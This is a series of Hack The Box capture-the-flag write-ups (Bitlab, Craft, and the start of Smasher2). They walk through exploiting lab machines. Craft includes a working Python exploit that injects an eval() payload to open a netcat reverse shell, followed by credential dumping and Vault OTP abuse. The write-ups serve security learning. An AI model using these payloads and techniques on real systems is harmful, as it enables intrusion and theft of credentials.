root@kali:~/Desktop/HTB/boxes/bitlab# stty raw -echo
root@kali:~/Desktop/HTB/boxes/bitlab# nc -lvnp 1337

www-data@bitlab:/var/www/html/profile$ export TERM=screen
www-data@bitlab:/var/www/html/profile$ 

Database Access –> Clave’s Password –> SSH as Clave –> User Flag

After getting a shell as www-data I wanted to use the credentials I got earlier from the code snippet and see what was in the database; however, psql wasn’t installed:

www-data@bitlab:/var/www/html/profile$ psql
bash: psql: command not found
www-data@bitlab:/var/www/html/profile$ 

So I had to do it with php:

www-data@bitlab:/var/www/html/profile$ php -a
Interactive mode enabled

php > $connection = new PDO('pgsql:host=localhost;dbname=profiles', 'profiles', 'profiles');

I executed the same query from the code snippet which queried everything from the table profiles, and I got clave’s password which I could use to get ssh access:

php > $result = $connection->query("SELECT * FROM profiles");
php > $profiles = $result->fetchAll();
php > print_r($profiles);
Array
(
    [0] => Array
        (
            [id] => 1
            [0] => 1
            [username] => clave
            [1] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
            [2] => c3NoLXN0cjBuZy1wQHNz==
        )

)
php > 




We owned user.

Reversing RemoteConnection.exe –> Root’s Password –> SSH as Root –> Root Flag

In the home directory of clave there was a Windows executable called RemoteConnection.exe:

clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt
clave@bitlab:~$ 

I downloaded it on my box:

root@kali:~/Desktop/HTB/boxes/bitlab# scp clave@10.10.10.114:/home/clave/RemoteConnection.exe ./
clave@10.10.10.114's password: 
RemoteConnection.exe                                                                                                                                                                                     100%   14KB  16.5KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/bitlab#

Then I started looking at the code decompilation with Ghidra. One function that caught my attention was FUN_00401520():


/* WARNING: Could not reconcile some variable overlaps */

void FUN_00401520(void)

{
  LPCWSTR pWVar1;
  undefined4 ***pppuVar2;
  LPCWSTR lpParameters;
  undefined4 ***pppuVar3;
  int **in_FS_OFFSET;
  uint in_stack_ffffff44;
  undefined4 *puVar4;
  uint uStack132;
  undefined *local_74;
  undefined *local_70;
  wchar_t *local_6c;
  void *local_68 [4];
  undefined4 local_58;
  uint local_54;
  void *local_4c [4];
  undefined4 local_3c;
  uint local_38;
  undefined4 ***local_30 [4];
  int local_20;
  uint local_1c;
  uint local_14;
  int *local_10;
  undefined *puStack12;
  undefined4 local_8;
  
  local_8 = 0xffffffff;
  puStack12 = &LAB_004028e0;
  local_10 = *in_FS_OFFSET;
  uStack132 = DAT_00404018 ^ (uint)&stack0xfffffffc;
  *(int ***)in_FS_OFFSET = &local_10;
  local_6c = (wchar_t *)0x4;
  local_14 = uStack132;
  GetUserNameW((LPWSTR)0x4,(LPDWORD)&local_6c);
  local_38 = 0xf;
  local_3c = 0;
  local_4c[0] = (void *)((uint)local_4c[0] & 0xffffff00);
  FUN_004018f0();
  local_8 = 0;
  FUN_00401260(local_68,local_4c);
  local_74 = &stack0xffffff60;
  local_8._0_1_ = 1;
  FUN_004018f0();
  local_70 = &stack0xffffff44;
  local_8._0_1_ = 2;
  puVar4 = (undefined4 *)(in_stack_ffffff44 & 0xffffff00);
  FUN_00401710(local_68);
  local_8._0_1_ = 1;
  FUN_00401040(puVar4);
  local_8 = CONCAT31(local_8._1_3_,3);
  lpParameters = (LPCWSTR)FUN_00401e6d();
  pppuVar3 = local_30[0];
  if (local_1c < 0x10) {
    pppuVar3 = local_30;
  }
  pWVar1 = lpParameters;
  pppuVar2 = local_30[0];
  if (local_1c < 0x10) {
    pppuVar2 = local_30;
  }
  while (pppuVar2 != (undefined4 ***)(local_20 + (int)pppuVar3)) {
    *pWVar1 = (short)*(char *)pppuVar2;
    pWVar1 = pWVar1 + 1;
    pppuVar2 = (undefined4 ***)((int)pppuVar2 + 1);
  }
  lpParameters[local_20] = L'\0';
  if (local_6c == L"clave") {
    ShellExecuteW((HWND)0x0,L"open",L"C:\\Program Files\\PuTTY\\putty.exe",lpParameters,(LPCWSTR)0x0
                  ,10);
  }
  else {
    FUN_00401c20((int *)cout_exref);
  }
  if (0xf < local_1c) {
    operator_delete(local_30[0]);
  }
  local_1c = 0xf;
  local_20 = 0;
  local_30[0] = (undefined4 ***)((uint)local_30[0] & 0xffffff00);
  if (0xf < local_54) {
    operator_delete(local_68[0]);
  }
  local_54 = 0xf;
  local_58 = 0;
  local_68[0] = (void *)((uint)local_68[0] & 0xffffff00);
  if (0xf < local_38) {
    operator_delete(local_4c[0]);
  }
  *in_FS_OFFSET = local_10;
  FUN_00401e78();
  return;
}

It looked like it was checking if the name of the user running the program was clave, and then it executed PuTTY with some parameters that I couldn’t see:

if (local_6c == L"clave") {
    ShellExecuteW((HWND)0x0,L"open",L"C:\\Program Files\\PuTTY\\putty.exe",lpParameters,(LPCWSTR)0x0
                  ,10);
  }

This is what the same part looked like in IDA:


I copied the executable to a Windows machine and tried to run it; however, it just kept crashing.
I opened it in Immunity Debugger to find out what was happening, and I found an access violation:


It happened before reaching the function I was interested in, so I had to fix it. What I did was simply replace the instructions that caused that access violation with NOPs.
I had to set a breakpoint before the cmp instruction, so I searched for the word “clave” in the referenced text strings and followed it in the disassembler:




Then I executed the program, and whenever I hit an access violation I replaced the instructions with NOPs. It happened twice, then I reached my breakpoint:




After reaching the breakpoint I could see the parameters that the program gives to putty.exe in both EAX and EBX. It was starting an SSH session as root, and I could see the password:


EAX 00993E80 UNICODE "-ssh [email protected] -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""
EBX 00993DA0 ASCII "-ssh [email protected] -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""




And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, follow on Twitter @Ahm3d_H3sham. Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Craft
Next Hack The Box write-up : Hack The Box - Player

Hack The Box - Craft

By: 0xRick
4 January 2020 at 05:00

Hack The Box - Craft

Quick Summary

Hey guys, today Craft retired and here’s my write-up about it. It’s a medium rated Linux box and its IP is 10.10.10.110; I added it to /etc/hosts as craft.htb. Let’s jump right in!




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/craft# nmap -sV -sT -sC -o nmapinitial craft.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-03 13:41 EST
Nmap scan report for craft.htb (10.10.10.110)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4p1 Debian 10+deb9u5 (protocol 2.0)
| ssh-hostkey: 
|   2048 bd:e7:6c:22:81:7a:db:3e:c0:f0:73:1d:f3:af:77:65 (RSA)
|   256 82:b5:f9:d1:95:3b:6d:80:0f:35:91:86:2d:b3:d7:66 (ECDSA)
|_  256 28:3b:26:18:ec:df:b3:36:85:9c:27:54:8d:8c:e1:33 (ED25519)
443/tcp open  ssl/http nginx 1.15.8
|_http-server-header: nginx/1.15.8
|_http-title: About
| ssl-cert: Subject: commonName=craft.htb/organizationName=Craft/stateOrProvinceName=NY/countryName=US
| Not valid before: 2019-02-06T02:25:47
|_Not valid after:  2020-06-20T02:25:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
| tls-nextprotoneg: 
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.97 seconds
root@kali:~/Desktop/HTB/boxes/craft# 

We got https on port 443 and ssh on port 22.

Web Enumeration

The home page was kind of empty, only the about info and nothing else:


The navigation bar had two external links: one of them was to https://api.craft.htb/api/ and the other one was to https://gogs.craft.htb:

<ul class="nav navbar-nav pull-right">
            <li><a href="https://api.craft.htb/api/">API</a></li>
            <li><a href="https://gogs.craft.htb/"><img border="0" alt="Git" src="/static/img/Git-Icon-Black.png" width="20" height="20"></a></li>
          </ul>

So I added both api.craft.htb and gogs.craft.htb to /etc/hosts, then I started checking them.
https://api.craft.htb/api:


Here we can see the API endpoints and how to interact with them.
We’re interested in the authentication part for now; there are two endpoints: /auth/check, which checks the validity of an authorization token, and /auth/login, which creates an authorization token given valid credentials.






We don’t have credentials to authenticate so let’s keep enumerating.
Obviously gogs.craft.htb had gogs running:


The repository of the API source code was publicly accessible so I took a look at the code and the commits.






Dinesh’s commits c414b16057 and 10e3ba4f0a had some interesting stuff. The first one had some code additions to /brew/endpoints/brew.py where user input is passed to eval() without filtering:


@@ -38,9 +38,13 @@ class BrewCollection(Resource):
         """
         Creates a new brew entry.
         """
-
-        create_brew(request.json)
-        return None, 201
+
+        # make sure the ABV value is sane.
+        if eval('%s > 1' % request.json['abv']):
+            return "ABV must be a decimal value less than 1.0", 400
+        else:
+            create_brew(request.json)
+            return None, 201
 @ns.route('/<int:id>')
 @api.response(404, 'Brew not found.')

I took a look at the API documentation again to find in which request I can send the abv parameter:


As you can see we can send a POST request to /brew and inject our payload in the parameter abv. However, we still need an authorization token to be able to interact with /brew, and we don’t have any credentials.
The other commit was a test script which had hardcoded credentials, exactly what we need:


+response = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
+json_response = json.loads(response.text)
+token =  json_response['token']
+
+headers = { 'X-Craft-API-Token': token, 'Content-Type': 'application/json'  }
+
+# make sure token is valid
+response = requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False)
+print(response.text)
+

I tested the credentials and they were valid:
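
Verifying them is basically the same thing the test script does; a minimal sketch along these lines (reusing the endpoints and credentials from the commit) is enough:

#!/usr/bin/python3
# check that dinesh's credentials work and that the returned token is valid
import requests

requests.packages.urllib3.disable_warnings()

req = requests.get('https://api.craft.htb/api/auth/login', auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
token = req.json()['token']
print(token)

headers = {'X-Craft-API-Token': token, 'Content-Type': 'application/json'}
print(requests.get('https://api.craft.htb/api/auth/check', headers=headers, verify=False).text)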



RCE –> Shell on Docker Container

I wrote a small script to authenticate, grab the token, exploit the vulnerability and spawn a shell.
exploit.py:

#!/usr/bin/python3 
import requests
import json
from subprocess import Popen
from sys import argv
from os import system

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

GREEN = "\033[32m"
YELLOW = "\033[93m" 

def get_token():
	req = requests.get('https://api.craft.htb/api/auth/login',  auth=('dinesh', '4aUh0A8PbVJxgd'), verify=False)
	response = req.json()
	token = response['token']
	return token

def exploit(token, ip, port):
	tmp = {}

	tmp['id'] = 0
	tmp['name'] = "pwned"
	tmp['brewer'] = "pwned"
	tmp['style'] = "pwned"
	tmp['abv'] = "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f')".format(ip,port)

	payload = json.dumps(tmp)

	print(YELLOW + "[+] Starting listener on port {}".format(port))
	Popen(["nc","-lvnp",port])

	print(YELLOW + "[+] Sending payload")
	requests.post('https://api.craft.htb/api/brew/', headers={'X-Craft-API-Token': token, 'Content-Type': 'application/json'}, data=payload, verify=False)

if len(argv) != 3:
	print(YELLOW + "[!] Usage: {} [IP] [PORT]".format(argv[0]))
	exit()

ip = argv[1]
port = argv[2]
print(YELLOW + "[+] Authenticating")
token = get_token()
print(GREEN + "[*] Token: {}".format(token))
exploit(token, ip, port)




It turned out that the application was hosted on a Docker container and I didn’t get a shell on the actual host.

/opt/app # cd /
/ # ls -la
total 64
drwxr-xr-x    1 root     root          4096 Feb 10  2019 .
drwxr-xr-x    1 root     root          4096 Feb 10  2019 ..
-rwxr-xr-x    1 root     root             0 Feb 10  2019 .dockerenv
drwxr-xr-x    1 root     root          4096 Jan  3 17:20 bin
drwxr-xr-x    5 root     root           340 Jan  3 14:58 dev
drwxr-xr-x    1 root     root          4096 Feb 10  2019 etc
drwxr-xr-x    2 root     root          4096 Jan 30  2019 home
drwxr-xr-x    1 root     root          4096 Feb  6  2019 lib
drwxr-xr-x    5 root     root          4096 Jan 30  2019 media
drwxr-xr-x    2 root     root          4096 Jan 30  2019 mnt
drwxr-xr-x    1 root     root          4096 Feb  9  2019 opt
dr-xr-xr-x  238 root     root             0 Jan  3 14:58 proc
drwx------    1 root     root          4096 Jan  3 15:16 root
drwxr-xr-x    2 root     root          4096 Jan 30  2019 run
drwxr-xr-x    2 root     root          4096 Jan 30  2019 sbin
drwxr-xr-x    2 root     root          4096 Jan 30  2019 srv
dr-xr-xr-x   13 root     root             0 Jan  3 14:58 sys
drwxrwxrwt    1 root     root          4096 Jan  3 17:26 tmp
drwxr-xr-x    1 root     root          4096 Feb  9  2019 usr
drwxr-xr-x    1 root     root          4096 Jan 30  2019 var
/ #

Gilfoyle’s Gogs Credentials –> SSH Key –> SSH as Gilfoyle –> User Flag

In /opt/app there was a Python script called dbtest.py. It connects to the database and executes a SQL query:

/opt/app # ls -la
total 44
drwxr-xr-x    5 root     root          4096 Jan  3 17:28 .
drwxr-xr-x    1 root     root          4096 Feb  9  2019 ..
drwxr-xr-x    8 root     root          4096 Feb  8  2019 .git
-rw-r--r--    1 root     root            18 Feb  7  2019 .gitignore
-rw-r--r--    1 root     root          1585 Feb  7  2019 app.py
drwxr-xr-x    5 root     root          4096 Feb  7  2019 craft_api
-rwxr-xr-x    1 root     root           673 Feb  8  2019 dbtest.py
drwxr-xr-x    2 root     root          4096 Feb  7  2019 tests
/opt/app # cat dbtest.py
#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SELECT `id`, `brewer`, `name`, `abv` FROM `brew` LIMIT 1"
        cursor.execute(sql)
        result = cursor.fetchone()
        print(result)

finally:
    connection.close()
/opt/app #

I copied the script and changed result = cursor.fetchone() to result = cursor.fetchall() and I changed the query to SHOW TABLES:

#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SHOW TABLES"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)

finally:
    connection.close()

There were two tables, user and brew:

/opt/app # wget http://10.10.xx.xx/db1.py
Connecting to 10.10.xx.xx (10.10.xx.xx:80)
db1.py               100% |********************************|   629  0:00:00 ETA

/opt/app # python db1.py
[{'Tables_in_craft': 'brew'}, {'Tables_in_craft': 'user'}]
/opt/app # rm db1.py
/opt/app #

I changed the query to SELECT * FROM user:

#!/usr/bin/env python

import pymysql
from craft_api import settings

# test connection to mysql database

connection = pymysql.connect(host=settings.MYSQL_DATABASE_HOST,
                             user=settings.MYSQL_DATABASE_USER,
                             password=settings.MYSQL_DATABASE_PASSWORD,
                             db=settings.MYSQL_DATABASE_DB,
                             cursorclass=pymysql.cursors.DictCursor)

try: 
    with connection.cursor() as cursor:
        sql = "SELECT * FROM user"
        cursor.execute(sql)
        result = cursor.fetchall()
        print(result)

finally:
    connection.close()

The table had all users’ credentials stored in plain text:

/opt/app # wget http://10.10.xx.xx/db2.py
Connecting to 10.10.xx.xx (10.10.xx.xx:80)
db2.py               100% |********************************|   636  0:00:00 ETA

/opt/app # python db2.py
[{'id': 1, 'username': 'dinesh', 'password': '4aUh0A8PbVJxgd'}, {'id': 4, 'username': 'ebachman', 'password': 'llJ77D8QFkLPQB'}, {'id': 5, 'username': 'gilfoyle', 'password': 'ZEU3N8WNM2rh4T'}]
/opt/app # rm db2.py
/opt/app #

Gilfoyle had a private repository called craft-infra:



He left his private ssh key in the repository:



When I tried to use the key it asked for a passphrase, as it was encrypted. I tried his Gogs password (ZEU3N8WNM2rh4T) and it worked:


We owned user.

Vault –> One-Time SSH Password –> SSH as root –> Root Flag

In Gilfoyle’s home directory there was a file called .vault-token:

gilfoyle@craft:~$ ls -la
total 44
drwx------ 5 gilfoyle gilfoyle 4096 Jan  3 13:42 .
drwxr-xr-x 3 root     root     4096 Feb  9  2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle  634 Feb  9  2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb  9  2019 .config
drwx------ 2 gilfoyle gilfoyle 4096 Jan  3 13:31 .gnupg
-rw-r--r-- 1 gilfoyle gilfoyle  148 Feb  8  2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb  9  2019 .ssh
-r-------- 1 gilfoyle gilfoyle   33 Feb  9  2019 user.txt
-rw------- 1 gilfoyle gilfoyle   36 Feb  9  2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 5091 Jan  3 13:28 .viminfo
gilfoyle@craft:~$ cat .vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle@craft:~$

A quick search revealed that it’s related to HashiCorp Vault.

Secure, store and tightly control access to tokens, passwords, certificates, encryption keys for protecting secrets and other sensitive data using a UI, CLI, or HTTP API. -vaultproject.io

By looking at vault.sh from the craft-infra repository (vault/vault.sh), we’ll see that it enables the ssh secrets engine then creates an OTP role for root:

#!/bin/bash

# set up vault secrets backend

vault secrets enable ssh

vault write ssh/roles/root_otp \
    key_type=otp \
    default_user=root \
    cidr_list=0.0.0.0/0

We have the token (.vault-token) so we can easily authenticate to Vault and create an OTP for a root SSH session:

gilfoyle@craft:~$ vault login
Token (will be hidden): 
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1
Key                Value
---                -----
lease_id           ssh/creds/root_otp/f17d03b6-552a-a90a-02b8-0932aaa20198
lease_duration     768h
lease_renewable    false
ip                 127.0.0.1
key                c495f06b-daac-8a95-b7aa-c55618b037ee
key_type           otp
port               22
username           root
gilfoyle@craft:~$

And finally we’ll ssh into localhost and use the generated password (c495f06b-daac-8a95-b7aa-c55618b037ee):

gilfoyle@craft:~$ ssh root@127.0.0.1


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/



Password: 
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# 




And we owned root!
That’s it, feedback is appreciated!
Don’t forget to read the previous write-ups, tweet about the write-up if you liked it, follow on Twitter @Ahm3d_H3sham.
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Smasher2
Next Hack The Box write-up : Hack The Box - Bitlab

Hack The Box - Smasher2

By: 0xRick
14 December 2019 at 05:00

Hack The Box - Smasher2

Quick Summary

Hey guys, today Smasher2 retired and here’s my write-up about it. Smasher2 was an interesting box and one of the hardest I have ever solved. It starts with a web application vulnerable to authentication bypass and RCE combined with a WAF bypass, followed by a kernel module with an insecure mmap handler implementation that allows users to access kernel memory. I enjoyed the box and learned a lot from it. It’s a Linux box and its IP is 10.10.10.135; I added it to /etc/hosts as smasher2.htb. Let’s jump right in!




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/smasher2# nmap -sV -sT -sC -o nmapinitial smasher2.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 07:32 EST
Nmap scan report for smasher2.htb (10.10.10.135)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 23:a3:55:a8:c6:cc:74:cc:4d:c7:2c:f8:fc:20:4e:5a (RSA)
|   256 16:21:ba:ce:8c:85:62:04:2e:8c:79:fa:0e:ea:9d:33 (ECDSA)
|_  256 00:97:93:b8:59:b5:0f:79:52:e1:8a:f1:4f:ba:ac:b4 (ED25519)
53/tcp open  domain  ISC BIND 9.11.3-1ubuntu1.3 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.3-Ubuntu
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds
root@kali:~/Desktop/HTB/boxes/smasher2# 

We got ssh on port 22, dns on port 53 and http on port 80.

DNS

The first thing I did was enumerate vhosts through the DNS server (a zone transfer with dig), and I got one result:

root@kali:~/Desktop/HTB/boxes/smasher2# dig axfr smasher2.htb @10.10.10.135

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> axfr smasher2.htb @10.10.10.135
;; global options: +cmd
smasher2.htb.           604800  IN      SOA     smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
smasher2.htb.           604800  IN      NS      smasher2.htb.
smasher2.htb.           604800  IN      A       127.0.0.1
smasher2.htb.           604800  IN      AAAA    ::1
smasher2.htb.           604800  IN      PTR     wonderfulsessionmanager.smasher2.htb.
smasher2.htb.           604800  IN      SOA     smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
;; Query time: 299 msec
;; SERVER: 10.10.10.135#53(10.10.10.135)
;; WHEN: Fri Dec 13 07:36:43 EST 2019
;; XFR size: 6 records (messages 1, bytes 242)

root@kali:~/Desktop/HTB/boxes/smasher2# 

That gave me wonderfulsessionmanager.smasher2.htb, which I added to my hosts file.

Web Enumeration

http://smasher2.htb had the default Apache index page:


http://wonderfulsessionmanager.smasher2.htb:


The only interesting thing here was the login page:


I kept testing it for a while and the responses were like this one:



It didn’t request any new pages, so I suspected that it was doing an AJAX request. I intercepted the login request to find out the endpoint it was requesting:

POST /auth HTTP/1.1
Host: wonderfulsessionmanager.smasher2.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wonderfulsessionmanager.smasher2.htb/login
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 80
Connection: close
Cookie: session=eyJpZCI6eyIgYiI6Ik16UXpNakpoTVRVeVlqaGlNekJsWVdSbU9HTXlPV1kzTmprMk1XSTROV00xWkdVME5HTmxNQT09In19.XfNxUQ.MznJKgs2isklCZxfV4G0IjEPcvg

{"action":"auth","data":{"username":"test","password":"test"}}

While browsing http://wonderfulsessionmanager.smasher2.htb I had gobuster running in the background on http://smasher2.htb/:

root@kali:~/Desktop/HTB/boxes/smasher2# gobuster dir -u http://smasher2.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://smasher2.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/13 07:37:54 Starting gobuster
===============================================================
/.git/HEAD (Status: 403)
/.hta (Status: 403)
/.bash_history (Status: 403)
/.config (Status: 403)
/.bashrc (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.profile (Status: 403)
/.mysql_history (Status: 403)
/.sh_history (Status: 403)
/.svn/entries (Status: 403)
/_vti_bin/_vti_adm/admin.dll (Status: 403)
/_vti_bin/shtml.dll (Status: 403)
/_vti_bin/_vti_aut/author.dll (Status: 403)
/akeeba.backend.log (Status: 403)
/awstats.conf (Status: 403)
/backup (Status: 301)
/development.log (Status: 403)
/global.asa (Status: 403)
/global.asax (Status: 403)
/index.html (Status: 200)
/main.mdb (Status: 403)
/php.ini (Status: 403)
/production.log (Status: 403)
/readfile (Status: 403)
/server-status (Status: 403)
/spamlog.log (Status: 403)
/Thumbs.db (Status: 403)
/thumbs.db (Status: 403)
/web.config (Status: 403)
/WS_FTP.LOG (Status: 403)
===============================================================
2019/12/13 07:39:17 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/smasher2# 

The only result that wasn’t 403 was /backup so I checked that and found 2 files:


Note: Months ago, when I solved this box for the first time, /backup was protected by basic HTTP authentication. That wasn’t the case when I revisited the box for the write-up, even after resetting it. I guess it got removed; however, it wasn’t an important step, it was just heavy brute force, so the box is better without it.
I downloaded the files to my box:

root@kali:~/Desktop/HTB/boxes/smasher2# mkdir backup
root@kali:~/Desktop/HTB/boxes/smasher2# cd backup/
root@kali:~/Desktop/HTB/boxes/smasher2/backup# wget http://smasher2.htb/backup/auth.py
--2019-12-13 07:40:19--  http://smasher2.htb/backup/auth.py
Resolving smasher2.htb (smasher2.htb)... 10.10.10.135
Connecting to smasher2.htb (smasher2.htb)|10.10.10.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4430 (4.3K) [text/x-python]
Saving to: ‘auth.py’

auth.py                                                    100%[=======================================================================================================================================>]   4.33K  --.-KB/s    in 0.07s   

2019-12-13 07:40:20 (64.2 KB/s) - ‘auth.py’ saved [4430/4430]

root@kali:~/Desktop/HTB/boxes/smasher2/backup# wget http://smasher2.htb/backup/ses.so 
--2019-12-13 07:40:43--  http://smasher2.htb/backup/ses.so
Resolving smasher2.htb (smasher2.htb)... 10.10.10.135
Connecting to smasher2.htb (smasher2.htb)|10.10.10.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18608 (18K)
Saving to: ‘ses.so’

ses.so                                                     100%[=======================================================================================================================================>]  18.17K  85.2KB/s    in 0.2s    

2019-12-13 07:40:44 (85.2 KB/s) - ‘ses.so’ saved [18608/18608]

root@kali:~/Desktop/HTB/boxes/smasher2/backup# 

By looking at auth.py I knew that these files were related to wonderfulsessionmanager.smasher2.htb.

auth.py: Analysis

auth.py:

#!/usr/bin/env python
import ses
from flask import session,redirect, url_for, request,render_template, jsonify,Flask, send_from_directory
from threading import Lock
import hashlib
import hmac
import os
import base64
import subprocess
import time

def get_secure_key():
    m = hashlib.sha1()
    m.update(os.urandom(32))
    return m.hexdigest()

def craft_secure_token(content):
    h = hmac.new("HMACSecureKey123!", base64.b64encode(content).encode(), hashlib.sha256)
    return h.hexdigest()


lock = Lock()
app = Flask(__name__)
app.config['SECRET_KEY'] = get_secure_key()
Managers = {}

def log_creds(ip, c):
    with open("creds.log", "a") as creds:
        creds.write("Login from {} with data {}:{}\n".format(ip, c["username"], c["password"]))
        creds.close()

def safe_get_manager(id):
    lock.acquire()
    manager = Managers[id]
    lock.release()
    return manager

def safe_init_manager(id):
    lock.acquire()
    if id in Managers:
        del Managers[id]
    else:
            login = ["<REDACTED>", "<REDACTED>"]
            Managers.update({id: ses.SessionManager(login, craft_secure_token(":".join(login)))})
    lock.release()

def safe_have_manager(id):
    ret = False
    lock.acquire()
    ret = id in Managers
    lock.release()
    return ret

@app.before_request
def before_request():
    if request.path == "/":
        if not session.has_key("id"):
            k = get_secure_key()
            safe_init_manager(k)
            session["id"] = k
        elif session.has_key("id") and not safe_have_manager(session["id"]):
            del session["id"]
            return redirect("/", 302)
    else:
        if session.has_key("id") and safe_have_manager(session["id"]):
            pass
        else:
            return redirect("/", 302)

@app.after_request
def after_request(resp):
    return resp


@app.route('/assets/<path:filename>')
def base_static(filename):
    return send_from_directory(app.root_path + '/assets/', filename)


@app.route('/', methods=['GET'])
def index():
    return render_template("index.html")


@app.route('/login', methods=['GET'])
def view_login():
    return render_template("login.html")

@app.route('/auth', methods=['POST'])
def login():
    ret = {"authenticated": None, "result": None}
    manager = safe_get_manager(session["id"])
    data = request.get_json(silent=True)
    if data:
        try:
            tmp_login = dict(data["data"])
        except:
            pass
        tmp_user_login = None
        try:
            is_logged = manager.check_login(data)
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]
            try:
                tmp_user_login = {"username": tmp_login["username"], "password": tmp_login["password"]}
            except:
                pass
            if not is_logged[0]:
                ret["authenticated"] = False
